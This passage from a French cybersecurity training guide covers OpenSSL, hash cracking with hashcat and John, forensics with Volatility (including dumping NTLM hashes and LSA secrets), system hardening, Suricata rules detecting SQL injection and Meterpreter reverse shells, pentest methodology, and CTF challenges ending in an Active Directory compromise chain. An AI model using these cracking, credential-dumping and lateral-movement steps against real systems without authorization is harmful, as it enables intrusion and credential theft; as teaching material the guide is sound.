openssl genrsa -aes256 -out private_enc.pem 4096 # Chiffree avec passphrase
# Extraire la cle publique
openssl rsa -in [Link] -pubout -out [Link]
# Chiffrer avec cle publique / Dechiffrer avec cle privee
openssl pkeyutl -encrypt -inkey [Link] -pubin -in [Link] -out [Link]
openssl pkeyutl -decrypt -inkey [Link] -in [Link] -out [Link]
# Signer / Verifier
openssl dgst -sha256 -sign [Link] -out [Link] [Link]
openssl dgst -sha256 -verify [Link] -signature [Link] [Link]
# === ELLIPTIC CURVE (ECDSA / ECDH) ===
openssl ecparam -genkey -name prime256v1 -noout -out ec_private.pem
openssl ec -in ec_private.pem -pubout -out ec_public.pem
openssl ecparam -list_curves # Voir toutes les courbes disponibles
# === ANALYSER UN CERTIFICAT TLS ===
openssl s_client -connect [Link] -showcerts
openssl x509 -in [Link] -text -noout
openssl x509 -in [Link] -noout -dates # Dates validite
openssl x509 -in [Link] -noout -subject # Sujet
openssl x509 -in [Link] -noout -issuer # Emetteur
openssl x509 -in [Link] -noout -fingerprint # Empreinte
# Verifier la chaine de certificats
openssl verify -CAfile [Link] [Link]
# === HACHAGE ===
echo -n 'motdepasse' | md5sum # MD5 (CASSE — ne pas utiliser pour passwords)
echo -n 'motdepasse' | sha256sum # SHA-256
echo -n 'motdepasse' | sha512sum # SHA-512
openssl passwd -6 'motdepasse' # SHA-512 crypt (Linux /etc/shadow)
# === CRACKER DES HASHES ===
hashcat -m 0 [Link] [Link] # MD5
hashcat -m 100 [Link] [Link] # SHA1
hashcat -m 1800 [Link] [Link] # sha512crypt ($6$)
hashcat -m 1000 [Link] [Link] # NTLM
hashcat -m 5600 [Link] [Link] # NTLMv2
- 42 -
CYBERSECURITE - GUIDE COMPLET
john --wordlist=[Link] [Link] # John the Ripper
7.3 Techniques CTF Cryptographie
# === CAESAR / ROT — DECHIFFRAGE ===
python3 -c "
text = 'KHOOR ZRUOG'
for shift in range(26):
dec = ''.join(chr((ord(c)-65-shift)%26+65) if [Link]()
else chr((ord(c)-97-shift)%26+97) if [Link]()
else c for c in text)
print(f'ROT{shift:2d}: {dec}')"
# ROT13 rapide
echo 'Uryyb Jbeyq' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
# === XOR ===
python3 -c "
ct = [Link]('1a2b3c4d5e') # ciphertext hex
key = b'key'
pt = bytes([c ^ key[i%len(key)] for i, c in enumerate(ct)])
print(pt)"
# === BASE ENCODINGS ===
echo 'Q1RGe2Jhc2U2NH0=' | base64 -d
echo '43544679626173653634' | xxd -r -p # Hex to ASCII
python3 -c "import base64; print(base64.b85decode('some_b85'))"
# === RSA FAIBLE — CTFTOOL ===
# Si n est petit ou si e est grand -> factorisation possible
python3 [Link] --publickey [Link] --private
python3 [Link] --publickey [Link] --uncipherfile [Link]
# Factoriser avec [Link] ou yafu
yafu 'factor(<n>)'
# === VIGENERE ===
# Trouver la longueur de cle avec l'indice de coincidence (IC)
# Kasiski test en ligne : [Link]/vigenere-cipher
# === CYBERCHEF — OUTIL WEB UNIVERSEL ===
# [Link]
# Operations chainables : Magic, From Base64, XOR, ROT13...
# 'Magic' detecte automatiquement les encodages
- 43 -
CYBERSECURITE - GUIDE COMPLET
CTF #07 - Crypto Maze
Scenario
Un message chiffre en plusieurs couches a ete intercepte. Chaque couche utilise un encodage ou
chiffrement different. Decouvert le flag cache au fond de la pile.
Objectifs
[1] Identifier le type d'encodage de la premiere couche (Base64 ?)
[2] Decoder chaque couche dans le bon ordre
[3] Identifier le chiffre de substitution (ROT ? Vigenere ?)
[4] Utiliser CyberChef pour chainer les operations
[5] Extraire le flag final
Outils suggeres
CyberChef ([Link] avec l'option 'Magic'
python3 pour les operations personnalisees
[Link] pour les chiffres classiques
Indice
Utilisez la fonction 'Magic' de CyberChef qui detecte automatiquement les couches d'encodage.
Format du flag
CTF{crypt0_l4y3r_by_l4y3r_d3c0d3d}
- 44 -
CYBERSECURITE - GUIDE COMPLET
MODULE 08
Forensique Numerique & Reponse
a Incident
Investiguer une compromission, analyser les artéfacts et reconstruire la chaine d'attaque. La
forensique numerique est le coeur du travail d'un analyste SOC et d'un intervenant DFIR.
OBJECTIFS DU MODULE
✓ Appliquer la methodologie de collecte de preuves (ordre de volatilite)
✓ Analyser un dump memoire avec Volatility 3
✓ Identifier les artefacts Windows forensiques cles
✓ Analyser des fichiers malveillants avec des outils statiques
✓ Rediger un rapport d'incident complet
8.1 Methodologie DFIR — Ordre de Volatilite
Priorite Source Volatilite Outils de collecte
1 Registres CPU / cache L1-L3 Tres haute Impossible a capturer (s'efface a l'extinction)
2 Memoire RAM Haute volatility, winpmem, avml, LiME (Linux)
3 Etat reseau / connexions Haute netstat, ss, tcpdump, Wireshark
4 Processus en cours Haute ps, tasklist, Process Hacker
5 Cache ARP / DNS Moyenne arp -a, ipconfig /displaydns
6 Disque dur (MFT, prefetch) Faible FTK Imager, dd, dcfldd, Autopsy
7 Logs systeme / applicatifs Faible Event Viewer, /var/log/, Splunk
8 Logs distants / SIEM Nulle Splunk, Elastic, Microsoft Sentinel
8.2 Acquisition de Memoire
# === LINUX — Acquisition memoire avec AVML ===
sudo ./avml /media/usb/[Link]
# LiME (module kernel)
sudo insmod [Link] 'path=/media/usb/[Link] format=lime'
# === WINDOWS — Acquisition avec WinPmem ===
winpmem_mini.exe [Link]
- 45 -
CYBERSECURITE - GUIDE COMPLET
# === CREATION D'UNE IMAGE DISQUE (dd) ===
sudo dd if=/dev/sda of=/media/usb/[Link] bs=4M status=progress
sudo dcfldd if=/dev/sda of=/media/usb/[Link] hash=md5 hashwindow=1G
# FTK Imager CLI
ftkimager /dev/sda /media/usb/acquisition --e01 --compress 6
# Verifier l'integrite (hash)
md5sum [Link] > [Link].md5
sha256sum [Link] > [Link].sha256
8.3 Volatility 3 — Reference Complete
# === INFORMATION GENERALE ===
vol3 -f [Link] [Link] # Infos OS, version, date
vol3 -f [Link] [Link] # Historique bash (Linux)
# === PROCESSUS ===
vol3 -f [Link] [Link] # Liste des processus (ordre PID)
vol3 -f [Link] [Link] # Arbre parent/enfant
vol3 -f [Link] [Link] # Scan structures EPROCESS (trouver process caches)
vol3 -f [Link] [Link] # Lignes de commande de chaque process
vol3 -f [Link] [Link] --pid 1234 # DLLs chargees par un process
# === RESEAU ===
vol3 -f [Link] [Link] # Connexions TCP/UDP actives
vol3 -f [Link] [Link] # Scan des structures reseau
# === CREDENTIALS ===
vol3 -f [Link] [Link] # Hashes NTLM (SAM)
vol3 -f [Link] [Link] # LSA secrets
vol3 -f [Link] [Link] # Hashes mis en cache
# === DETECTION MALWARE ===
vol3 -f [Link] [Link] # Injections de code (rwx sections)
vol3 -f [Link] [Link] # Services Windows (dont services caches)
vol3 -f [Link] [Link] # Drivers charges
vol3 -f [Link] [Link] # System Service Descriptor Table (hooking)
vol3 -f [Link] [Link] # Mutexes (IOC malware)
# === FICHIERS ET REGISTRE ===
vol3 -f [Link] [Link] # Tous les fichiers ouverts en memoire
vol3 -f [Link] [Link] --pid 1234 # Extraire fichiers d'un process
- 46 -
CYBERSECURITE - GUIDE COMPLET
vol3 -f [Link] [Link] --virtaddr 0xfffff... # Par adresse virtuelle
vol3 -f [Link] [Link] # Ruches de registre chargees
vol3 -f [Link] [Link] --key
'Software\Microsoft\Windows\CurrentVersion\Run'
# === LINUX SPECIFIQUE ===
vol3 -f [Link] [Link]
vol3 -f [Link] [Link]
vol3 -f [Link] [Link]
vol3 -f [Link] linux.check_creds # Verifier privileges root
8.4 Artefacts Windows Forensiques Cles
Artefact Localisation Information utile
Prefetch C:\Windows\Prefetch\*.pf Execution programmes, timestamps, frequence
Event Logs C:\Windows\System32\winevt\Logs\ 4624/25 login, 4688 process, 7045 service
Registry NTUSER C:\Users\<user>\[Link] MRU, Recent docs, UserAssist
Shimcache HKLM\SYSTEM\...\AppCompatCache Historique execution executables
Amcache C:\Windows\appcompat\Programs\[Link]
SHA1 hash des executables lances
LNK Files C:\Users\<user>\AppData\Roaming\... Fichiers recemment ouverts
Jumplists C:\Users\<user>\AppData\Roaming\... Applications et documents recents
MFT ($MFT) Racine NTFS Tous fichiers + timestamps MACB
Browser History AppData\Local\<browser>\User Data\ URLs visitees, downloads, cookies
PowerShell Logs HKLM\SOFTWARE\...\PowerShell\ ScriptBlockLogging (si active)
# === ANALYSE LOGS WINDOWS AVEC POWERSHELL ===
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select -First 20
Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688} | Format-List
# === ANALYSE LOGS LINUX ===
# Connexions SSH reussies
grep 'Accepted password' /var/log/[Link] | tail -50
grep 'Accepted publickey' /var/log/[Link]
# Tentatives de brute force SSH
grep 'Failed password' /var/log/[Link] | awk '{print $11}' | sort | uniq -c | sort -rn |
head -20
# Commandes sudo
grep 'sudo:' /var/log/[Link]
# Connexions web Apache
- 47 -
CYBERSECURITE - GUIDE COMPLET
grep ' 200 ' /var/log/apache2/[Link] | awk '{print $1}' | sort | uniq -c | sort -rn
grep ' 500 ' /var/log/apache2/[Link]
# === ANALYSE MALWARE STATIQUE ===
file [Link] # Type de fichier
strings [Link] | grep -i 'http\|https\|cmd\|powershell'
strings [Link] | grep -E '[0-9]{1,3}\.[0-9]{1,3}' # IPs
exiftool [Link] # Metadonnees
md5sum [Link] && sha256sum [Link] # Hasher pour VT
# Analyse PE avec pecheck
[Link] [Link]
# Sandbox en ligne
# - VirusTotal : [Link]/gui/home/upload
# - [Link] : [Link]
# - Hybrid Analysis : [Link]
# - Cuckoo : self-hosted sandbox
CTF #08 - Incident Response
Scenario
Vous recevez un dump memoire Windows ([Link]) d'une machine suspecte. L'equipe SOC signale
des connexions sortantes anormales. Identifiez le processus malveillant, extrayez le payload et trouvez le
flag qu'il contient.
Objectifs
[1] Analyser le dump avec [Link] et [Link]
[2] Identifier le processus suspect (parent inhabituel, nom clone de svchost...)
[3] Verifier les connexions reseau ([Link])
[4] Utiliser [Link] pour trouver les injections
[5] Extraire le binaire suspect avec [Link]
[6] Analyser le binaire avec strings pour trouver le flag
Outils suggeres
vol3 -f [Link] [Link]
vol3 -f [Link] [Link] | head -50
vol3 -f [Link] [Link] --pid
strings | grep CTF
Indice
Un [Link] dont le parent n'est pas [Link] est presque toujours malveillant.
Format du flag
CTF{v0l4t1l1ty_m3m0ry_4n4lys1s_m4lw4r3_d3t3ct3d}
- 48 -
CYBERSECURITE - GUIDE COMPLET
- 49 -
CYBERSECURITE - GUIDE COMPLET
MODULE 09
Hardening & Defense Active
Passer du cote defensif : durcir les systemes, configurer les solutions de securite et mettre en place
une architecture Zero Trust.
OBJECTIFS DU MODULE
✓ Appliquer les CIS Benchmarks pour Linux et Windows
✓ Configurer iptables / nftables et Fail2Ban
✓ Deployer et configurer Snort/Suricata comme IDS/IPS
✓ Comprendre le modele Zero Trust et la micro-segmentation
✓ Analyser des logs avec un SIEM (Elastic Stack / Splunk)
9.1 Hardening Linux — CIS Benchmarks
# === AUDIT INITIAL AVEC LYNIS ===
sudo lynis audit system
sudo lynis audit system --quick # Sans confirmation
# Le rapport est dans /var/log/[Link]
# Score > 80 = bonne posture de securite
# === SECURISATION SSH (/etc/ssh/sshd_config) ===
Protocol 2 # SSH v2 uniquement
PermitRootLogin no # Desactiver login root direct
PasswordAuthentication no # Cles uniquement
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
X11Forwarding no
AllowUsers deployuser adminuser # Whitelist utilisateurs
AllowGroups sshusers # Ou par groupe
Banner /etc/ssh/[Link] # Banniere legale
ClientAliveInterval 300
ClientAliveCountMax 2
# Redemarrer SSH
sudo systemctl restart sshd
- 50 -
CYBERSECURITE - GUIDE COMPLET
# === FAIL2BAN — BLOQUER LE BRUTE FORCE ===
sudo apt install fail2ban -y
# /etc/fail2ban/[Link]
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3
[sshd]
enabled = true
port = 22
logpath = /var/log/[Link]
[apache-auth]
enabled = true
sudo systemctl enable --now fail2ban
sudo fail2ban-client status # Voir les bans
sudo fail2ban-client status sshd
# === PERMISSIONS ET SUID/SGID DANGEREUX ===
find / -perm -4000 -type f 2>/dev/null # Binaires SUID
find / -perm -2000 -type f 2>/dev/null # Binaires SGID
find / -writable -type d 2>/dev/null # Repertoires world-writable
find /etc -type f -perm /o+w 2>/dev/null # Fichiers /etc modifiables
# Supprimer SUID inutiles
chmod u-s /usr/bin/at
chmod u-s /usr/bin/wall
# === DESACTIVER SERVICES INUTILES ===
sudo systemctl disable --now avahi-daemon cups bluetooth rpcbind
sudo systemctl mask [Link] [Link] [Link]
# === AUDITD — AUDIT DES ACTIONS SYSTEME ===
sudo apt install auditd audispd-plugins
sudo auditctl -w /etc/passwd -p war -k password_changes
sudo auditctl -w /etc/sudoers -p rwa -k sudoers
sudo auditctl -a always,exit -F arch=b64 -S execve -k exec_commands
sudo ausearch -k password_changes # Rechercher evenements
9.2 Firewall avec iptables et nftables
# === IPTABLES — POLITIQUE RESTRICTIVE ===
- 51 -
CYBERSECURITE - GUIDE COMPLET
# Vider les regles existantes
sudo iptables -F && sudo iptables -X && sudo iptables -Z
# Politique par defaut : bloquer tout
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT ACCEPT
# Autoriser loopback
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT
# Autoriser connexions etablies et liees
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Autoriser SSH depuis un reseau specifique seulement
sudo iptables -A INPUT -p tcp --dport 22 -s [Link]/24 -m state --state NEW -j ACCEPT
# Autoriser HTTP et HTTPS
sudo iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -m state --state NEW -j ACCEPT
# Limiter les tentatives de connexion SSH (anti-brute force)
sudo iptables -A INPUT -p tcp --dport 22 -m recent --set --name SSH
sudo iptables -A INPUT -p tcp --dport 22 -m recent --update --seconds 60 --hitcount 4
--name SSH -j DROP
# Logger et rejeter le reste
sudo iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix 'IPTABLES-DROP: '
sudo iptables -A INPUT -j DROP
# Sauvegarder les regles
sudo iptables-save > /etc/iptables/rules.v4
sudo apt install iptables-persistent
# === NFTABLES (successeur iptables) ===
sudo apt install nftables
sudo nft list ruleset
sudo nft add table inet filter
sudo nft add chain inet filter input { type filter hook input priority 0\; policy drop\; }
sudo nft add rule inet filter input ct state established,related accept
sudo nft add rule inet filter input tcp dport 22 ip saddr [Link]/24 accept
9.3 Snort/Suricata — IDS/IPS
- 52 -
CYBERSECURITE - GUIDE COMPLET
# === INSTALLATION SURICATA ===
sudo apt install suricata -y
sudo suricata-update # Mettre a jour les regles
sudo suricata-update list-sources # Voir les sources de regles
# Lancer en mode IDS sur une interface
sudo suricata -c /etc/suricata/[Link] -i eth0
# Analyser un fichier pcap
sudo suricata -r [Link] -l /var/log/suricata/
# Voir les alertes
cat /var/log/suricata/[Link]
jq . /var/log/suricata/[Link] | less
# === ECRIRE UNE REGLE SURICATA ===
# /etc/suricata/rules/[Link]
# Detecter une scan Nmap SYN
alert tcp any any -> $HOME_NET any (msg:'SCAN Nmap SYN';
flags:S; threshold: type both, track by_src, count 20, seconds 1;
sid:1000001; rev:1;)
# Detecter SQLi basique
alert http any any -> $HTTP_SERVERS any (msg:'SQL Injection Attempt';
content:"' OR "; nocase; http_client_body;
sid:1000002; rev:1;)
# Detecter connexion DNS vers domaine suspect
alert dns any any -> any 53 (msg:'DNS Query to suspicious domain';
[Link]; content:"malware.c2"; nocase;
sid:1000003; rev:1;)
# Detecter Meterpreter reverse TCP
alert tcp $HOME_NET any -> any 4444 (msg:'Possible Meterpreter Reverse TCP';
flags:S; sid:1000004; rev:1;)
CTF #09 - Blue Team Defense
Scenario
Vous recevez [Link] et [Link] d'un serveur compromise. Identifiez l'attaque, l'attaquant, et ecrivez
les regles de detection.
Objectifs
[1] Analyser [Link] pour trouver le brute force SSH (IP, timestamps, nb tentatives)
- 53 -
CYBERSECURITE - GUIDE COMPLET
[2] Identifier l'IP ayant reussi a se connecter
[3] Analyser [Link] pour trouver les payloads SQLi ou traversee de chemin
[4] Ecrire une regle fail2ban pour bloquer le brute force
[5] Ecrire une regle Suricata pour detecter les tentatives SQLi
[6] Calculer le score CVSS de la vulnerabilite exploitee
Outils suggeres
grep 'Failed password' [Link] | awk '{print $11}' | sort | uniq -c | sort -rn
grep 'Accepted' [Link]
grep -E "('|union|select|drop)" [Link] -i
Indice
Cherchez une IP avec 100+ echecs puis 1 succes. C'est le signe d'un brute force reussi.
Format du flag
CTF{bl43_t34m_d3f3nd3r_l0g_4n4lys1s_pr0}
- 54 -
CYBERSECURITE - GUIDE COMPLET
MODULE 10
Strategies CTF & Methodologie
Pentest
Consolider l'ensemble des acquis, maitriser la methodologie pentest professionnelle et developper
des strategies efficaces pour les competitions CTF.
OBJECTIFS DU MODULE
✓ Maitriser la methodologie pentest PTES/OSSTMM de bout en bout
✓ Developper une strategie CTF par categorie
✓ Rediger un rapport de pentest professionnel
✓ Connaitre les plateformes de pratique et certifications cles
✓ Construire son lab personnel de cybersecurite
10.1 Methodologie Pentest Professionnelle
Phase Nom Livrables Outils / Techniques
1 Pre-engagement Contrat, scope, RoE signes Templates, checklists legales
2 Reconnaissance Rapport OSINT, cartographie surface Nmap, Shodan, theHarvester
3 Enumeration Services, versions, utilisateurs Nmap -sV -sC, enum4linux
4 Vuln Analysis Liste CVE + CVSS + validation OpenVAS, Nessus, searchsploit
5 Exploitation Preuves d'acces (screenshots, files) Metasploit, exploits manuels
6 Post-Exploitation Scope de l'impact reel Meterpreter, mimikatz, pivot
7 Lateral Movement Cartographie du reseau interne BloodHound, impacket
8 Persistence Preuves de persistance (desactivee) Taches planifiees, cles SSH
9 Couverture traces Logs nettoyes (en lab uniquement) Clearev meterpreter
10 Rapport Executive Summary + Technical Report
Dradis, Word, LaTeX
10.2 Structure d'un Rapport de Pentest
# === EXECUTIVE SUMMARY (1-2 pages) ===
- Contexte et objectifs de la mission
- Dates et perimetre teste
- Synthese des vulnerabilites : X Critiques, Y Elevees, Z Moyennes
- 55 -
CYBERSECURITE - GUIDE COMPLET
- Top 3 des risques les plus importants (non-technique)
- Score de risque global (ex: 8.2/10)
- Recommandations prioritaires
# === RESUME DES VULNERABILITES ===
Tableau de toutes les CVE avec : CVE-ID, Titre, CVSS, Systeme affecte,
Statut (Ouvert / Corrige), Priorite (P1 Critique / P2 Elevee / P3 Moyenne)
# === DETAILS TECHNIQUES (une section par vuln) ===
Pour chaque vulnerabilite :
- Titre : ex: 'MS17-010 EternalBlue - RCE sans authentification'
- CVE et score CVSS
- Systeme(s) affecte(s) : IP, hostname, OS
- Description technique
- Preuve d'exploitation (screenshot, output commande)
- Impact potentiel (confidentialite, integrite, disponibilite)
- Recommandation de correction specifique
- References (CVE, articles, patches officiels)
# === ANNEXES ===
- Scope complet (IPs testees)
- Logs et outputs bruts des outils
- Timeline des activites
- Methodologie utilisee (PTES, OSSTMM, OWASP)
10.3 Strategies CTF par Categorie
Categorie Workflow recommande Outils essentiels
Web Enumerer -> Tester OWASP Top 10 -> SQLi Burp
-> XSS
Suite, sqlmap, ffuf, Nikto
Pwn (Binaire) checksec -> trouver vuln -> exploiter avec pwntools
GDB+peda/pwndbg, pwntools, ROPgadget
Reverse Engg file -> strings -> desassembler -> comprendreGhidra,
logiqueIDA Free, radare2, ltrace
Cryptographie Identifier algo -> chercher faiblesse -> casserCyberChef, RsaCtfTool, hashcat, sage
Forensique Binwalk -> Volatility -> Autopsy -> Strings Volatility, Autopsy, binwalk, foremost
OSINT Domaine -> WHOIS -> DNS -> Reseaux sociaux
Maltego, Shodan, theHarvester
Steganographie Analyser metadata -> lsb -> frequences steghide, stegsolve, zsteg, exiftool
Reseau (pcap) Protocol hierarchy -> Follow streams -> Decode
Wireshark, tshark, NetworkMiner
Misc Identifier le type -> CyberChef -> creer script CyberChef, Python, Cyberchef
10.4 Construire son Lab Personnel
- 56 -
CYBERSECURITE - GUIDE COMPLET
# === OPTION 1 : LAB LOCAL (VirtualBox / VMware) ===
# Machines recommandees :
- Kali Linux (attaquant) : derniere version officielle
- Metasploitable 2 ou 3 : cibles Linux/Windows vulnerables
- VulnHub machines : download gratuit sur [Link]
- Windows Server 2019 eval : 180 jours gratuits (Microsoft)
# Configuration reseau recommandee :
- NAT Network : acces internet depuis toutes les VMs
- Host-Only : reseau isole pour les attaques (aucune fuite)
- Carte 2 : bridged (optionnel, pour labs avances)
# === OPTION 2 : PROXMOX (lab serveur dedie) ===
# Proxmox VE gratuit sur vieux PC (8GB RAM minimum)
# Creer des VMs et snapshots facilement
# Accessible via browser depuis le reseau local
# === OPTION 3 : CLOUD (AWS/Azure/VPS) ===
# AWS Free Tier : EC2 [Link]
# Attention : scanner des IPs sans autorisation = illegal meme en cloud
# Utiliser VPCs prives et security groups restrictifs
# === PLATEFORMES EN LIGNE (recommandees) ===
TryHackMe : [Link] (debutant - guide)
HackTheBox : [Link] (intermediaire/avance)
PicoCTF : [Link] (CTF educatif permanent)
CTFtime : [Link] (calendrier CTF mondiaux)
VulnHub : [Link] (machines a download)
PortSwigger Academy : [Link]/web-security (web gratuit)
OWASP WebGoat : local Docker (app web vulnérable guidee)
DVWA : local Docker (Damn Vulnerable Web App)
10.5 Certifications Recommandees
Certification Organisme Niveau Type Cout approx.
CompTIA Security+ CompTIA Debutant QCM 400 USD
eJPT eLearnSecurity Debutant Pratique 200 USD
CEH EC-Council Intermediaire QCM+Lab 1100 USD
PNPT TCM Security Intermediaire Pratique 5j 400 USD
OSCP Offensive Sec. Avance Pratique 24h 1499 USD
- 57 -
CYBERSECURITE - GUIDE COMPLET
CRTO Zero-Point Sec. Avance Lab 4j 400 GBP
CRTE Altered Security Expert Lab AD 249 USD
CISSP ISC2 Expert QCM adaptatif 699 USD
CISM ISACA Expert QCM 575 USD
CTF #10 - Full Chain Attack
Scenario
Challenge final integrant tous les modules. Une infrastructure lab complete (serveur web + base de
donnees + domaine Windows AD) est disponible. Obtenez le flag administrateur de domaine.
Objectifs
[1] Reconnaissance complete (Nmap + sous-domaines + OSINT)
[2] Exploitation web (SQLi ou RCE sur l'appli web exposee)
[3] Elevation de privileges locale sur le serveur web
[4] Pivot vers le reseau interne (autoroute + socks)
[5] Enumeration Active Directory (BloodHound / ldapdomaindump)
[6] Compromission DC (Kerberoasting, Pass-the-Hash ou zerologon)
[7] Extraire le flag dans \\DC\flags\[Link]
[8] Ecrire un mini Executive Summary de 10 lignes
Outils suggeres
nmap -> gobuster -> sqlmap -> msfconsole
impacket-GetUserSPNs + hashcat (Kerberoasting)
BloodHound + SharpHound pour la cartographie AD
Indice
BloodHound visualise les chemins d'attaque vers Domain Admin. Cherchez les ACL abusables.
Format du flag
CTF{full_ch41n_d0m41n_4dm1n_0wn3d_gr34t_w0rk}
- 58 -
CYBERSECURITE - GUIDE COMPLET
FIN DU GUIDE — BONNE CHANCE !
Vous avez parcouru 10 modules couvrant l'integralite du spectre de la cybersecurite offensive et
defensive. Des fondations reseau jusqu'a la compromission d'un domaine Active Directory, en passant par
la forensique et le durcissement des systemes.
Hack legally. Learn continuously. Defend actively.
- 59 -